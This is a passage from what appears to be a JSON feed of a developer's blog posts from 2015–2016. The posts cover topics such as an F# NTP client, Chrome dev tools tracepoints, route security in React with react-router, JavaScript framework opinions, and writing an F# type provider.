point for hackers.\nAs a web developer I have another reason for why this matters, interoperability. The IE team spent a lot of time in IE11 to improve interoperability, including adding a bunch of webkit vendor prefixes. While I don't agree with having to add webkit prefixes around the shop, having the web just work across all browsers is something I can get behind.\nMy company has an app requiring IE While the argument of "well, just upgrade it" might be the preferred option it's not always the simplest option, and if that's the case then you should check out Enterprise Mode for IE11. This gives your users the power of IE11 for the general web, but allows you to invoke a legacy mode for your internal applications.\nConclusion It's time to upgrade!\n", "id": "2016-01-03-are-you-ready-for-january-12" }, { "title": "2015 - A year in review", "url": "https://www.aaron-powell.com/posts/2016-01-01-2015-a-year-in-review/", "date": "Fri, 01 Jan 2016 00:00:00 +0000", "tags": [ "year-review" ], "description": "A look back at the year that was.", "content": "And just like that another year has come to a close. 
To me it's felt like I've been really quite quiet compared to past years, but a quick count shows that I published 17 posts on here, which is just as many as I did in 2014.\nMicrosoft released a new browser, codenamed Project Spartan and later renamed Microsoft Edge. This was pretty huge (I think) for web developers and I speculated on what it would mean. Having now been using Edge as my primary browser since it first came into the Windows 10 previews I must say I am a happy web user. For my day-to-day activities Edge just works, the way any browser should, I don't recall the last time I had a rendering issue, or platform issue (other than 1Password Teams, which has a bunch of broken accounts with invalid keys, of which I have one). My biggest gripe is the lack of plugins, I don't have access to my password manager which plain sucks. I'm sure something is in the works (c'mon, it's gotta be!) but until then it's going to be a hassle that I can live with.\nAs a web developer there are 2 things that annoy me: that I can't side-dock (easily) and the lack of plugins (which make working with frameworks much easier). I really want side docking because I have more horizontal space than vertical so I want to leverage that with my tools off to the side. Now sure, you can use snap to achieve this, but it's not an integrated resize so it's a 2nd class citizen. I also talked about one of my favourite features in F12 and how to simulate tracepoints in Chrome's dev tools. If you're not using tracepoints (or a simulated attempt) I recommend getting in on the action.\nIn among the excitement of a new browser coming out there were the expected trolls who seem to think that there should be a single browser and that it should be Chrome. So I took to my keyboard to do a writeup about the dangers of a browser monoculture.\nBut it wasn't all browsers, I dived back into F# this year, speaking at the F# Sydney user group on writing a type provider (which I would like to explore further with Umbraco for strong typing without the mess of writing classes, but that's a problem for another day). I then joined in the F# Advent Calendar and wrote about how to know what time it is using F# and ntp.\nI also continued my work with Pluralsight, this year I turned my attention to getting their Umbraco content up and running, first publishing Umbraco Jumpstart which aims to give an overview to people new to Umbraco, then followed it up with Using ASP.NET MVC with Umbraco to look at the development experience. In 2016 I'll be looking to add more courses to the library on Umbraco and am always open to suggestions on what you'd like to see (I have some ideas but I'd prefer to be driven by the community).\nThe one thing that was really different this year, which is why I think it's felt like a quiet year for me, is I did much less speaking than in previous years, in fact this was the first year my wife and I didn't go overseas to a conference. I missed my first DDD Melbourne ever (and the other DDDs) but that was because they scheduled it on the same day as my wife was due with our first child, which I figured I should hang around in Sydney for. My hope is to make it back this year and we're also looking to start up DDD Sydney again, we've spoken to a venue that we like but there's a bunch of background work before we can lock it in. Keep your eyes open for announcements.\nAnd finally I hit my 5 years at Readify and also received a promotion to Lead Consultant. 
This has given me the opportunity to spend more time focusing on the business side of consulting, undertaking workshops, and working with my fellow consultants on their careers. Shameless plug, we're looking for people to join us, so if you've wanted to get into consulting drop us a line or email me directly (my email isn't hard to find ;)), we'll even help you relocate to Australia if you're not already here.\nWell, that's a wrap.\n", "id": "2016-01-01-2015-a-year-in-review" }, { "title": "What's the time Mr Wolf?", "url": "https://www.aaron-powell.com/posts/2015-12-07-whats-the-time-mr-wolf/", "date": "Mon, 07 Dec 2015 00:00:00 +0000", "tags": [ "fsharp", "FsAdvent" ], "description": "Telling the time with F# and ntp.", "content": " Tis the season, and to get into the festive spirit I'm contributing to the 2015 F# Advent calendar.\nRecently I was working with a client who had a need to run some business processes at certain times. So how do you know what the time is? We crack out System.DateTimeOffset don't we!\nWell it turns out that there is a flaw when it comes to using that, in the form of clock drift, that thing where your microwave and phone are no longer showing the same time, even though you are sure you set them to the same time the other day!\nOn Windows you can dive into your date time settings and there's an option to sync with a time server. By default this is time.windows.com and I've seen that dialog plenty of times over my IT career, but I had never really paid much attention to how my computer knows it's 11.59pm 24th December, have you? So your computer will sync to this place, it'll sync periodically (you have some control over it, but not a lot), and this posed a problem for my client, as clock drift could be a problem for them.\nWell, what time IS it? If we're establishing our problem we need to know what time it is, very accurately. Well there's a particular kind of clock which is highly precise, the atomic clock. Since these things are kind of big you can't really put one on your desk, so let's think of the next best thing, how does Windows know what time it is? Well this happens using an atomic clock (or a similar precision device like a GPS) and is done via the Network Time Protocol (ntp). You connect to an ntp server, which in turn has synced with a server above it, and so on until you hit an atomic clock, or a stratum 0 time instrument.\nWell ntp is a pretty simple protocol, you use a UDP socket and get a byte array, 48 bytes in length, which has all the important information.\nSo let's implement an ntp client in F#.\nTalking to the server The first thing we're going to need to do is to connect to our ntp server. 
I’m going to keep using time.windows.com as my sample, but there’s plenty of different time servers, of varying stratum levels (time.windows.com is stratum 4, which means there are 4 off the source).\nI’m going to resolve the IP of my server first, let’s create a getEndPoint function:\nlet getEndPoint (server : string) = Next I’m going to use System.Net.Dns to get the IP address:\nlet getEndPoint (server : string) = let address = Dns.GetHostEntryAsync(server) But this is an async method (and C# async) so we’ll do some pipelining:\nlet getEndPoint (server : string) = let address = Dns.GetHostEntryAsync(server) |> Async.AwaitTask |> Async.RunSynchronously This returns an IPHostEntry which then I can use to get the IPs for the host and I’ll take the first IP from that:\nlet getEndPoint (server : string) = let address = Dns.GetHostEntryAsync(server) |> Async.AwaitTask |> Async.RunSynchronously |> fun entry -> entry.AddressList |> fun list -> list.[0] Finally I’ll create the endpoint connection using port 123 which is the standard ntp port:\nlet getEndPoint (server : string) = let address = Dns.GetHostEntryAsync(server) |> Async.AwaitTask |> Async.RunSynchronously |> fun entry -> entry.AddressList |> fun list -> list.[0] new IPEndPoint(address, 123) Now we’re ready to connect our ntp server via a UDP socket:\nlet getTime (ipEndpoint : IPEndPoint) = let ntpData = [| for i in 0..47 -> match i with | 0 -> byte 0x1B | _ -> byte 0 |] let socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp) socket.Connect(ipEndpoint) socket.ReceiveTimeout <- 3000 socket.Send(ntpData) |> ignore socket.Receive(ntpData) |> ignore socket.Close() ntpData F# makes generating the data packet array really easy and using a match means that we can set the various bytes as they need to be set (for example I’m initialising a version in the first byte). I should be setting the Originate Timestamp at bytes 32 - 39 which you could also do in the match but I’m a bit lazy (note: not doing this means it’s harder to work out the time based on latency).\nExtracting our data Now I have a byte array that is full of useful information that has been returned from our ntp server, but it’s in raw bytes and they aren’t overly readable so we probably want to split that apart. I’m going to create a record type to represent it:\ntype NtpResponse = { Stratum : int ReferenceTime : DateTime OriginateTime : DateTime ReceiveTime : DateTime TransmitTime : DateTime } Then we’ll make a function to break apart our byte array\nlet extractor (ntpData : byte[]) = { Stratum = int ntpData.[1] ReferenceTime = DateTime.Now OriginateTime = DateTime.Now ReceiveTime = DateTime.Now TransmitTime = DateTime.Now } The first bit that I’m extracting is the stratum, which tells us what level the server is. This information is useful if you’re wanting to know how close a server is to the time source, as the further away from the time source the more network hops have occurred. 
We’re also casting the value from a byte to an int, which in F# we need to be more explicit about than if we were doing it in C#\nBut the more important part of the data that we have is the date/time components, which are 8 bytes starting at 16, 24, 32 and 40 respectively, so let’s look at how we can get them out of the array.\nThe 8 bytes that make up the timestamp are comprised of a 64 bit fixed point timestamp which we need break into the 32 bit integer value representing the seconds since Unix Epoch and 32 bit floating point value that is the precision of the timestamp.\nTo do this I’m going to create a function that takes the 8 bytes and gets me a timestamp:\nlet extractTime ntpData position = let intPart = BitConverter.ToUInt32(ntpData, int position) let fracPart = BitConverter.ToUInt32(ntpData, int position + 4) We’re using uint32 to represent the data that we’re pulling out (since it could be a large number). But the next this we need to deal with is that the value is Big Endianness notation so it needs to be swapped for us to use. Well that function isn’t too hard to write…\nlet swapEndianness (x : uint64) = (((x &&& uint64 0x000000ff) <<< 24) + ((x &&& uint64 0x0000ff00) <<< 8) + ((x &&& uint64 0x00ff0000) >>> 8) + ((x &&& uint64 0xff000000) >>> 24)) Now we can update our extractTime method with this to generate the miliseconds and create our DateTime object:\nlet extractTime ntpData position = let intPart = BitConverter.ToUInt32(ntpData, int position) let fracPart = BitConverter.ToUInt32(ntpData, int position + 4) let ms = ((swapEndianness (uint64 intPart)) * uint64 1000) + ((swapEndianness (uint64 fracPart)) * uint64 1000) / uint64 0x100000000L (new DateTime(1900, 1, 1, 0, 0, 0, DateTimeKind.Utc)).AddMilliseconds(float ms) It’s times like this I really miss the operator overloading of C#…\nWith our extractTime method working let’s go back to completing the extractor:\nlet extractor extractTime (ntpData : byte[]) = let extractor' = extractTime ntpData let referenceTime = extractor' 16 let originateTime = extractor' 24 let receiveTime = extractor' 32 let transmitTime = extractor' 40 { Stratum = int ntpData.[1] ReferenceTime = referenceTime OriginateTime = originateTime ReceiveTime = receiveTime TransmitTime = transmitTime } And with a bit of partial application we can bind the extractTime method to the ntpData so that it is simpler to invoke.\nFinishing it all up With all our functions written we can now work out what the time is:\nlet time = getEndPoint "time.windows.com" |> getTime |> extractor extractTime printfn "The time is %s" (time.TransmitTime.ToString("dd/MM/yyyy hh:mm:ss.fffffff")) And we’re done. Well mostly, I’ve left a few exercises to you dear reader if you’d like to finish this off:\nSet the Originate Time in the data you send to the ntp server Use the time the request was sent from the client with the time on the server to determine the real time without latency (using the clock synchronisation algorithm) Extract the other parts from the response packet, like version, poll interval (so you know how often you can hit the server), etc Conclusion Time is all relative but with ntp we can work out just how relative it is. With a little bit of F# we can query a ntp server and get the time information back. 
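If you want to attempt the second of the exercises above (working out the real time once latency is accounted for), the standard ntp offset and delay calculation is only a few lines. Here’s a minimal sketch, assuming the NtpResponse record from earlier and that t1 and t4 are timestamps you’ve captured yourself around the socket send and receive calls (they aren’t produced by the code in this post):
// t1 = time the request left the client, t4 = time the response arrived back at the client
// t2/t3 come from the response we extracted above
let offsetAndDelay (t1 : DateTime) (response : NtpResponse) (t4 : DateTime) =
    let t2 = response.ReceiveTime
    let t3 = response.TransmitTime
    // offset: how far the local clock is ahead of (or behind) the server's clock
    let offset = ((t2 - t1) + (t3 - t4)).TotalMilliseconds / 2.0
    // delay: the round trip time minus the time the server spent processing
    let delay = ((t4 - t1) - (t3 - t2)).TotalMilliseconds
    offset, delay
Applying that offset to your local clock gives you a time that accounts for the latency of the request.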
Hopefully this has been a bit of fun looking at how one of the protocols we take for granted works.\n", "id": "2015-12-07-whats-the-time-mr-wolf" }, { "title": "Simulating tracepoints in Chrome dev tools", "url": "https://www.aaron-powell.com/posts/2015-08-30-simulating-tracepoints-in-chrome-dev-tools/", "date": "Sun, 30 Aug 2015 00:00:00 +0000", "tags": [ "web-dev", "javascript", "f12", "chrome", "debugging" ], "description": "One of my favourite under-appreciated F12 tooling features is tracepoints, and I want to look at how to simulate it in Chrome's dev tools.", "content": "There’s a very under-rated feature in MS Edge’s F12 tools called tracepoints. A tracepoint is like a breakpoint but it calls console.log with the statement you provide it. This is really useful when you want to inspect some state as your application runs but don’t want to interrupt the application flow by adding a breakpoint, or can’t modify your code and inject console.log statements (eg: production environments).\nWell it turns out that we can easily simulate this in the Chrome dev tools (and I suspect Firefox too, but I don’t spend much time debugging in Firefox), and that’s by exploiting conditional breakpoints.\nWith a conditional breakpoint it runs what you give it and if it’s true you’ll have the application break, if it returns false it’ll continue on unimpeded. If we exploit type coercion in JavaScript we can call console.log as our conditional breakpoint statement and not return anything, since console.log returns undefined which is coerced to false.\nAnother thing we can do is use the JavaScript comma operator, which allows us to chain statements together, with each executed and the final one in the chain being the returned value. If we combine this with the type coercion we can execute multiple console.log statements from a single conditional breakpoint.\nNifty little trick, especially when debugging environments we can’t access.\n", "id": "2015-08-30-simulating-tracepoints-in-chrome-dev-tools" }, { "title": "Error with MS Edge F12 tools on Windows 10 10158", "url": "https://www.aaron-powell.com/posts/2015-06-30-f12-error-in-windows-10-10158/", "date": "Tue, 30 Jun 2015 00:00:00 +0000", "tags": [ "ms-edge" ], "description": "A fix for a small problem in MS Edge F12 tools on Windows 10 build 10158.", "content": "Today I upgraded to the latest Windows 10 Fast Ring insiders build, 10158. As with all previous builds this includes some updates to the new Microsoft browser, Edge (which now officially ships inside Windows, woo!).\nWhile trying to solve a problem on the site I’m working on I opened up F12 and went to use the profiler, only to be met with an error.\nI had a quick chat with some of my contacts over on the F12 team to see if it was a known bug or something to be reported, and they suggested that I restart the Internet Explorer ETW Collector Service, which you’ll find in your list of Windows Services.
For me this service was not running, starting it up and a restart of Edge and the problem went away.\nHopefully this helps someone else out there.\n", "id": "2015-06-30-f12-error-in-windows-10-10158" }, { "title": "Learn how to get started with Umbraco on Pluralsight", "url": "https://www.aaron-powell.com/posts/2015-06-15-umbraco-jumpstart-on-pluralsight/", "date": "Mon, 15 Jun 2015 00:00:00 +0000", "tags": [ "umbraco", "pluralsight" ], "description": "My new Pluralsight course, Umbraco Jumpstart is out!", "content": "TL;DR My latest Pluralsight course, Umbraco Jumpstart is up.\nOver the last few months I’ve been working on a new Pluralsight course, Umbraco Jumpstart, today it finally got published and I couldn’t be happier.\nThis is very much a beginner course, my aim was to help people who have either never seen Umbraco before or haven’t had a chance to play with it yet take their first steps into Umbraco. Basically I want to ge a whole new generation of people working with Umbraco. That does mean that if you’re already using Umbraco it might be a little bit too basic for you, but now is where you can chime in.\nWith this course out I want to look at what comes next, what topics do you want to see covered on Pluralsight in the Umbraco space as I really want to start getting the library built up. So my fellow Umbracians, what would you like me to start covering?\n", "id": "2015-06-15-umbraco-jumpstart-on-pluralsight" }, { "title": "Sometimes you just want a hamburger", "url": "https://www.aaron-powell.com/posts/2015-06-11-sometimes-you-just-want-a-hamburger/", "date": "Thu, 11 Jun 2015 00:00:00 +0000", "tags": [ "web-dev" ], "description": "A tongue in cheek look at JavaScript framework analogies.", "content": "My friend Chris Love wrote an article stating that Large JavaScript Frameworks are like Fast Food Resturants and a related article Why Micro JavaScript Should Be Used In Your Next Application. I want to write a bit of a rebuttal to these posts but it’ll be in my typical serious manner :P.\n300g of beef mince with a good fat content\n1 egg\nBreadcrumbs\nSalt\nPepper\nWorcestershire\nMustard\nGarlic\nOregano\nLettuce\n1 tomato\n2 eggs\nBacon\n2 pickles\nTomato sauce (not ketchup)\nMustard\nBeetroot\nCheese\n2 burger bun\nIn case you haven’t worked out we’re making a hamburger (well, 2 actually, a 300g patty would be a little excessive!) and here are my base ingredients. Now I have to construct my burger, go through the process of combining ingredients, cooking the patty, constructing the burger, making sure there is just the right amount of beetroot (we’re making a proper Aussie burger after all) and eventually consuming it.\nNow if I ever want to reproduce it I have to make sure that it’s written down somewhere, a recipe or ‘documentation’ if you will. What if I want to share the load and have someone do some of the work with me? I better make sure that I have the process written down too. 
Say I walk away from the cooking part way through, I want to make sure someone can easily pick up from where I left off without having to scrap everything they’ve previously learnt or worse, throw out my attempt because it’s too complex to follow.\nRight about now you might be asking yourself “Why am I reading a post about making hamburgers?” and it’s probably because I’m doing a poor job of drawing a parallel between cooking and JavaScript frameworks.\nFast doesn’t mean unhealthy One of the main points in Chris’s argument is that we need to avoid obesity and that large JavaScript frameworks are a root cause of this within web applications. While it is true that frameworks like Ember, Backbone, Angular and React (or wait, is React not a framework? I confused…) are large may do more than you need from your application it doesn’t mean that they are inherently unhealthy for your application. Instead what they tend to do is give are options and solve problems that people smarter than me have already solved.\nLet’s take for example the $http service in AngularJS. I’ve blogged before about the basics of AJAx and on the surface it’s pretty simple, but it very quickly becomes complex. Take a look at what’s needed to POST form data, you have to construct the FormData object, set it’s values, set the appropriate HTTP headers, etc. Then there’s the response side, are you going to use promises or callbacks? How about content negotiation, parsing the response to the right type, etc.\nNot so simple now is it?\nI have all the raw ingredients Over the last few years browsers have become more and more powerful with more and more features available natively, from querySelectorAll to give us CSS querying from JavaScript, WebGL if we want to do 3D, Web Audio for sound, Canvas for drawing, IndexedDB for complex data stores and that’s on top of the standardisation of features like events, element manipulation, etc.\nTo go back to our hamburger analogy I could go out and get myself some chuck, grab my mincer (yes I do own a mincer) and create my own mince to start my patty. I have all the building blocks I need but really, am I going to mince my own meat ever time, probably not.\nNow don’t get me wrong, I’m a long-time advocate of Vanilla.js. I strongly believe that you should learn the fundamentals but that doesn’t mean they are your only tool, the frameworks people build on top of these fundamentals are powerful and can save you a lot of development effort. jQuery is a great example of this, yes the DOM in today’s browsers gives us the power to do everything you want from jQuery but there’s things it does that simplify this for us. Take the even bubbling and filtering, jQuery makes it very easy to provide an event handler at a common root but filter on the source of said event. It’s a thin wrapper over DOM events but it’s highly convenient.\nI’ll make it my own way To address the points in Chris’s 2nd article, we should use micro frameworks where possible, single purpose libraries that do one thing and one thing well. I’ll go out and grind my mince, add my spices and then it’s the patty I’m after. I’ll get my sauces and mix them up to the desired tomato-to-mustard ratio.\nBut now here’s the problem, I have a one-of-a-kind burger that to know how it came together, how to recreate it, how to disassemble it, find what’s missing and reassemble it, is making the enjoyment of my burger harder.\nAnd this is where micro frameworks start to fall apart. 
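(A quick aside before we go on: to make the earlier jQuery event delegation point concrete, here’s the delegated handler next to a rough vanilla equivalent; the selectors are made up purely for illustration.)
// jQuery: one handler at a common root, filtered by the source of the event
$('#menu').on('click', '.menu-item', function () {
  console.log('clicked', this.textContent);
});

// Roughly the same idea with plain DOM APIs
document.querySelector('#menu').addEventListener('click', function (e) {
  var item = e.target.closest('.menu-item');
  if (item) {
    console.log('clicked', item.textContent);
  }
});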
You’re building a SPA so you go and grab an AJAX library, a thin DOM library, some custom eventing (or pubsub) to make you application disconnected, add DI, templating, security, data state management, promises and so on. Congratulations you’ve created something that doesn’t have a massive framework behind it, or does it? Have you traded AngularJS for your own equally as bloated combination of micro frameworks?\nThen once you’ve completed your non framework application you have another problem, maintenance. This unique collection of micros only exists in its current configuration in a single application, yours. How do you find solutions to your problems? We no longer have the communities to contact, it’s up to us to work out how to fix it ourselves (which isn’t necessarily a bad thing, but knowledge sharing is powerful).\nThen what happens if you, or one of your team members, leave this project? Now the number of people who understand this application design has decreased. As a consultant this is a very real problem that I face when my role wraps up and I walk out with knowledge. There’s only one real solution to this, documentation and while this knowledge drain can happen on any project the more custom a solution the more you need to document and we all know how well developers document projects. Is that few kb you’re saving just being replaced by dozens of pages of documentation and levels of complexity? What if you need to hire someone new? Is someone with Ember skills easier to find than ‘generic JavaScript’ and giving them a pile of documentation to learn your non framework?\nConclusion I like to cook (or at least I like the idea of cooking, the actuality might not really be what people want :P) but I also like my fried chicken.\nWhile it might be nice to sit back and say that we should avoid these large JavaScript frameworks because they bring bloat to our applications we need to also should avoid the other extreme, thinking that completely custom non framework applications are superior. You might be trading one kind of bloat for another. An application is more than what you wrote today, it’s the code you haven’t written, the bugs you haven’t found, the documentation you haven’t done.\nKnow how your food is made, what goes into your frameworks and how you can leverage years of chefs and cooks just like we leverage the development community.\nAn application built on a paleo diet is just as unhealthy as one built on fast food.\nPS: Don’t just eat fast food, that would be stupid.\n", "id": "2015-06-11-sometimes-you-just-want-a-hamburger" }, { "title": "Implementing security in React with react-router", "url": "https://www.aaron-powell.com/posts/2015-06-08-implementing-security-in-react-with-react-router/", "date": "Mon, 08 Jun 2015 00:00:00 +0000", "tags": [ "react", "react-router", "security" ], "description": "A look at how to page-based security with React and react-router.", "content": "In the past I’ve talked about how to do simple security with React but the focus has been on how can you conditionally include pieces on a page depending on what the user is allowed to do. Today I want to take this a step further and look at how you would do page-to-page security in a SPA using React. For this I’m going to be using the excellent react-router navigation framework.\nAlso like my last post I’m going to take a bit of a liberty on how you do security, that’s beyond the scope, let’s assume you can determine if a user is logged in or not and what their roles are. 
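For the snippets that follow I’ll lean on a userService for those checks; you can picture it being shaped something like this (a hypothetical sketch, how the user actually gets authenticated is entirely up to you):
'use strict';

// Hypothetical userService: how the user gets populated is out of scope here
let user = null;

export default {
  get authenticated() {
    return user !== null;
  },
  get currentUser() {
    return user;
  },
  getProfile() {
    // imagine an AJAX call that resolves with { roles: [...] }
    return Promise.resolve(user);
  }
};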
I’m also assuming you are familiar with react-router a bit already.\nAuthenticated routes The first thing I want to do is setup routes that you much be logged in for, this could be acting as a public/subscriber system. To do that we’re going to take advantage of the pipeline that react-router gives us when navigating to a page (or transitioning as their documentation refers to it). The way this works is it looks for a particular static method on the React component that you will be navigating to and we can add some logic to potentially cancel that navigation request. I’m going to create a component called AuthenticatedRoute:\n'use strict'; import React from 'react'; import userService from './services/userService'; class AuthenticatedRoute extends React.Component { static willTransitionTo(transition) { if (!userService.authenticated) { transition.redirect('login', {}, { 'nextPath': transition.path }); } } constructor(props) { super(props); } } export default AuthenticatedRoute; I’ve done this using the ES2015 support for React and ES2015 class syntax plus ES2015 import syntax for loading dependencies.\nThe most important method in this component that I’ve got is the willTransitionTo method, this is what react-router looks for to run before the navigation has been completed. The first argument to this method is the transition object which is used to control the navigation event that is happening. transition has three methods on it, abort, cancel and redirect. The one that we want to use here is the redirect method to navigate to the login page when the user is not logged in (which I am using a userService to determine) and we can also get the path that we’re trying to get to from transition.path to pass along with the redirect and then send you back after you do log in.\nNow let’s see a usage of it:\n'use strict'; import React from 'react'; import AuthenticatedRoute from './AuthenticatedRoute'; class UserProfilePage extends AuthenticatedRoute { constructor(props) { super(props); } render() { //render logic here } } export default UserProfilePage; Pretty easy ey? We just extend (inherit) from our AuthenticatedRoute and it’s all sorted.\nAdding roles Now thatwe’ve got basic security checks going let’s setup it up to work out that not only if you are logged in you also have permission to get to where you want to go. You’re logged in as a standard user but try and get into the site administration system, we probably want to stop that. To do that we’ll expand our willTransitionTo method logic:\nstatic willTransitionTo(transition) { if (!userService.authenticated) { transition.redirect('login', {}, { 'nextPath': transition.path }); } else if (this.rolesRequired) { let userRoles = userService.currentUser.roles; if (!this.rolesRequired.every(role => userRoles.indexOf(role) >= 0)) { transition.redirect('not-authorised'); } } } So I’ve added an else if block, and I’m looking for another static on the component, a static property called rolesRequired which would be an array of roles that are required for the user to access this particular route. If there are roles required to get to this page then the user must have all of these roles, the .every query on the array (you could implement this as a ‘require any of these roles’ use the .some array query method). 
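For example, a ‘require any of these roles’ variant of that check is just a matter of swapping the .every for a .some, something like this sketch:
static willTransitionTo(transition) {
  if (!userService.authenticated) {
    transition.redirect('login', {}, { 'nextPath': transition.path });
  } else if (this.rolesRequired) {
    let userRoles = userService.currentUser.roles;
    // .some: the user only needs one of the required roles, not all of them
    if (!this.rolesRequired.some(role => userRoles.indexOf(role) >= 0)) {
      transition.redirect('not-authorised');
    }
  }
}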
Then we do a redirect away if the user can’t access the route just like with login.\nAnd how do we use this new update:\n'use strict'; import React from 'react'; import AuthenticatedRoute from './AuthenticatedRoute'; class UserAdminPage extends AuthenticatedRoute { static get rolesRequired() { return ['admin']; } constructor(props) { super(props); } render() { //render logic here } } export default UserAdminPage; Because I don’t want the rolesRequired property value to be mutable I’m implementing this as a get-only property, which is the get <name>() { ... } syntax. Pretty simple and clean I reckon.\nGoing async Not everything that we can do can be synchronous, I’ve assumed that is the case so far but maybe loading the profile happens and it might not have happened before the navigation occurs. Say our userService now looks like:\nuserService.getProfile().then(profile => ...) Now we return a promise from the userservice’s getProfile method, how does that fit into a synchronous flow of navigation?\nConveniently the willTransitionTo method can be made asynchronous by changing the parameters passed in:\nstatic willTransitionTo(transition, params, query, callback) { ... } The additional parameters are:\nparams - the url segments defined, like an id or such if you’ve defined /foo/:id query - the query string info of the URL callback - a function to invoke once an async operation has completed The last argument, callback, is the one that is of interest to us now. The way react-router works is it looks at the number of arguments your function takes and if it’s 4 then it will hault the navigation until that callback is invoked, and you invoke the callback regardless of success of failure. So let’s update our code:\nstatic willTransitionTo(transition, params, query, callback) { if (!userService.authenticated) { transition.redirect('login', {}, { 'nextPath': transition.path }); } else if (this.rolesRequired) { userService.getProfile().then(profile => { let userRoles = profile.roles; if (!this.rolesRequired.every(role => userRoles.indexOf(role) >= 0)) { transition.redirect('not-authorised'); } callback(); }, err => { transition.redirect('error', { error: err }); callback(); }); return; } callback(); } Now that we have access to the callback once the async request has completed we invoke it and then bail out of the function. If we didn’t do a role check we’ll still call callback, else react-router doesn’t know that the navigation event is completed.\nConclusion There we go, page-to-page security using react-router’s built in hooks to add checks in our React SPA. I think it works pretty cleanly by giving us a base type to inherit from and simple logic. We can always add additional conditional steps if we want to add different security checks as well.\nThe one thing that this won’t necissarily work well for is if you’re using the nested routing with react-router. 
Because that only navigates a section of the page rather than the whole page you might want to look at the approach I talked about in my previous posts.\nYou can find a basic implementation in the code from my ANZCoders talk.\n", "id": "2015-06-08-implementing-security-in-react-with-react-router" }, { "title": "Chauffeur on uHangout", "url": "https://www.aaron-powell.com/posts/2015-06-06-chauffeur-on-uhangout/", "date": "Sat, 06 Jun 2015 00:00:00 +0000", "tags": [ "umbraco", "chauffeur" ], "description": "I recently talked about Chauffeur and my thoughts on deployments on uHangout.", "content": "Last year I introduced a new tool I’ve been working on called Chaffeur which aims to help deployments in Umbraco.\nA few weeks ago my friend Warren Buckley invited me on his weekly Umbraco show, uHangout to talk about Chauffeur and deployments with Umbraco. If you missed it you can go back and watch it online.\n", "id": "2015-06-06-Chauffeur-on-uhangout" }, { "title": "Talking about front-end development on ANZCoders", "url": "https://www.aaron-powell.com/posts/2015-06-06-talks-on-anzcoders/", "date": "Sat, 06 Jun 2015 00:00:00 +0000", "tags": [ "anzcoders", "web-dev", "gulp", "react" ], "description": "I did two talks at ANZCoders on front-end development, covering the toolchain and a look at React.", "content": "Two weeks ago was the first ANZCoders virtual conference and I was lucky enough to present two sessions. Being a virtual conference all the content was recorded an you’ll be able to watch them on YouTube if you missed the sessions.\nThe wonderful world of front end tools Link\nIn recent years there has been a huge change in the way we do front end applications. Back in the day we had tools like Client Dependency but these days runtime bundling/minification is no longer seen as the way to go, the rise of npm the way we manage dependencies and lastly there’s the rise of the transpiler, be it a language-to-JavaScript transpiler like React or we’re using Babel to use ES6 features today.\nIn this talk I look at what tools we as ASP.Net developers need to start looking at, I cover off:\nUsing Yeoman as a generator to create an ASP.Net 5 application Getting external modules with npm or bower, with my preference being to use npm Managing your dependencies with browserify or webpack I also talk about consuming dependencies, my recommenation is using ES2015 modules and transpile them down How to do a ‘build’ of client assets using grunt or gulp. I was originally a grunt user but have since moved to gulp and am liking it more and more If you’re building ASP.Net application (or any web applications) today and you’re not using these tools in your toolchain then you’re really missing out here.\nReact, another JavaScript framework? Link\nI’ve recently had the opportunity to work on a greenfields project where we got to make a lot of the technology choices. 
Because we wanted to build a SPA I made the decision that we’d use React for the UI of the application.\nWith this talk I more looked at what problem space React works in, some common concerns people have about React (aka, JSX) and finished off with an application I built showing common things like:\nSecurity (although, really basic security) Routing, via react-router Real-time communication with SignalR The code for my sample application can be found on GitHub and also includes a number of the things I talked about in the other talk, using Gulp for building the files from JSX to JavaScript, etc.\n", "id": "2015-06-06-talks-on-anzcoders" }, { "title": "Writing a F# Type Provider", "url": "https://www.aaron-powell.com/posts/2015-02-06-writing-a-fsharp-type-provider/", "date": "Fri, 06 Feb 2015 00:00:00 +0000", "tags": [ "f#", "fsharp" ], "description": "A walkthrough of how to create a F# Type Provider.", "content": "I was recently asked to give a talk at the Sydney F# User Group about how to write a Type Provider (and other things).\nNow I’m fairly new to writing F# and even newer to writing Type Providers but having done code generation in the past using various .NET APIs (DSL’s, CodeDom, T4) I’m well versed in the pain that is to be expected when doing code generation.\nWhat’s a Type Provider?If you haven’t come across Type Providers before what they are is something that hooks into the F# compiler to generate types based on some pre-conditions. The most common usage is to generate data source information, such as a SQL data context, strongly typed CSV’s or classes from JSON.\nThe primary advantage here is that it’s done at the compiler level, types are generated then and those types are used in your codebase. If something changes in your data schema, say the properties of a JSON object change, you hit a compiler error rather than a runtime error, and that’s pretty neat.\nSounds cool, how do I get started?When writing a Type Provider you can probably generate something without any external dependencies. Unfortunately that is a hell of a lot of code to write to build some of the stuff out, code that you’re likely to get wrong or is just painful to write. If you look at any of the samples out there or existing Type Providers you’ll see two files named something like ProvidedTypes.fsi and ProvidedTypes.fs. What these contains is some nice base classes for starting your implementations.\nNote: Presently I don’t know exactly where you get them from, there seems to be no NuGet package or anything, instead what I will be doing for this walkthrough is copying them from the F# Samples project. If someone knows where you get the “master” copy from or a NuGet package to reference I’m all ears!\nEdit: As has been pointed out in the comments there is a NuGet package which will include the appropriate base classes, FSharp TypeProviders Starter Pack. I haven’t updated the code below to work with it so there may be some minor differences.\nWe’ll start be creating a new F# library project then copy in our ProvidedTypes.fs/fsi files and deleting Library1.fs.\nFile -> New -> Type ProviderFor this walkthrough I’m going to create the super-simple Type Provider I demoed at the F# User Group. 
It’s called StringTypeProvider so create a new F# file named that.\nLet’s also open a few namespaces so it looks like so:\n1 2 3 4 5 6 7 namespace Samples.FSharp.StringTypeProvider open System open System.Reflection open Samples.FSharp.ProvidedTypes open Microsoft.FSharp.Core.CompilerServices open Microsoft.FSharp.Quotations Note: Samples.FSharp.ProvidedTypes is the namespace for the stuff I got imported.\nNext we’ll create our Type Provider type:\n1 2 3 [<TypeProvider>] type StringTypeProvider(config: TypeProviderConfig) as this = inherit TypeProviderForNamespaces() This is a compiler error for the moment but we’ll get to that.\nWe’ve done three things here:\nCreated a type that has an attribute of TypeProvider. This tells the F# compiler that this type is a Type Provider and to use it as such Created a type that has a constructor argument of TypeProviderConfig which we then alias to this for us to use internally Inherited from a type called TypeProviderForNamespace which takes the complexity of our type construction (which we’ll get to later) The final thing we need to do before we go about implementing our Type Provider is tell the F# compiler that this assembly has Type Providers in it, we do that with an assembly attribute, so put this in the AssemblyInfo.cs (or somewhere else):\n1 2 [<assembly:TypeProviderAssembly>] do() So far our file looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 namespace Samples.FSharp.StringTypeProvider open System open System.Reflection open Samples.FSharp.ProvidedTypes open 